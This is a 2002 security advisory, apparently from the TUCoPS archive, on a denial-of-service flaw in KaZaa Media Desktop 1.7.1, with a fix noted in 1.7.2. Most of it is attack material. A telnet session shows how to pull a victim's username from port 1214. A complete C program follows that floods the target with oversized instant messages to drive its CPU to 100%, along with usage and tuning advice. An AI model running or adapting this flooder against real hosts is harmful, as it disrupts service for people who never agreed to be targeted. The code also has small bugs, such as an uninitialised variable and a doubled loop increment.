26th Jul 2002 [SBWID-5561]
COMMAND
KaZaa Denial of Service Attack
SYSTEMS AFFECTED
KaZaa v1.7.1
PROBLEM
Josh [josh@pulltheplug.com] & omega [mtwoar@hotmail.com] with the
assistance of SooT :
There exists a denial of service attack in KaZaa Media Desktop file
sharing utility that allows an attacker to force CPU usage to rise to
100% upon sending large messages to the victim. Basically it seems to
have the same effect as opening an exceptionally large text file in
some text editor. The added bonus is the decryption that is performed
on the message, which adds to the CPU usage. Exploitation merely
requires the I.P. of the victim and a username. The username can be
obtained as such:
$ telnet <ip> 1214
Trying <ip>...
Connected to <ip>.
Escape character is '^]'.
GET / HTTP/1.1 // My input
HTTP/1.0 404 Not Found // Server output
X-Kazaa-Username: <the user name of the user>
X-Kazaa-Network: KaZaA
X-Kazaa-IP: <the_ip_you_typed>:1214
X-Kazaa-SupernodeIP: <censored>:1214
Connection closed by foreign host.
Assuming you and the receiving user have the bandwidth to transmit and
receive the message before the connection to the user's kazaa server
times out, a good proof of concept length is 20 messages at 100
iterations of the 4026 byte message tell... 300 iterations 20 times
will make it pretty evident.
/*
kazaa denial of service attack
by Josh and omega
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <stdarg.h>
#define PORT 1214
int main(int argc, char *argv[])
{
int fd, numbytes, randnum, k;
struct hostent *host;
struct sockaddr_in them;
char buf2[4026];
char buf[5000];
char *bigboy;
int i, size, j;
memset(buf2, 'a', sizeof(buf2));
buf2[sizeof(buf2)-1]='\0';
srand(time(NULL));
if (argc < 5)
{
fprintf(stderr,"usage: %s <hostname> <(this*4026) bytes per message> <username_of_target> <number_of_messages>\n", argv[0]);
exit(1);
}
if ((host=gethostbyname(argv[1])) == NULL)
{
perror("gethostbyname");
exit(1);
}
them.sin_family = AF_INET;
them.sin_port = htons(PORT);
them.sin_addr = *((struct in_addr *)host->h_addr);
memset(&(them.sin_zero), '\0', 8);
size=(4042*atoi(argv[2]))+280+1;
bigboy=(char *)malloc(size);
snprintf(bigboy, size, "GET /.message HTTP/1.1\nHost: 68.10.112.148:1214\nUserAgent: KazaaClient Jan 18 2002 18:53:21\nX-Kazaa-Username: 31337h4x0r\nX-Kazaa-Network: KaZaA\nX-Kazaa-IP: %d:1214\nX-Kazaa-SupernodeIP: %d:1214\nConnection: open\nX-Kazaa-IMTo: %s@KaZaA\nX-Kazaa-IMType: user_text\n", randnum, randnum, argv[3]);
/* the msg appears as one msg to the receiver, but comes in intervals of 4096 bytes... */
snprintf(buf, sizeof(buf), "X-Kazaa-IMData: %s\n", buf2);
for(k=0;k<atoi(argv[2]);k++)
{
strcat(bigboy, buf);
k++;
}
strcat(bigboy, "\r\n\r\n\r\n\r\n\r\n");
fprintf(stdout, "done preparing packet... sending\n");
for(i=0, k=0;i<atoi(argv[4]);i++)
{
if ((fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("socket");
}
else
{
if (connect(fd, (struct sockaddr *)&them,sizeof(struct sockaddr)) == -1)
{
perror("connect");
}
else
{
printf("sending %d message\n", k);
write(fd, bigboy, strlen(bigboy));
k++;
close(fd);
}
}
}
fprintf(stdout, "\n%d out of %d attempted got through\n", k, i);
free(bigboy);
return 0;
}
SOLUTION
KaZaa v1.7.2 has been released and is a fix for the problem
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
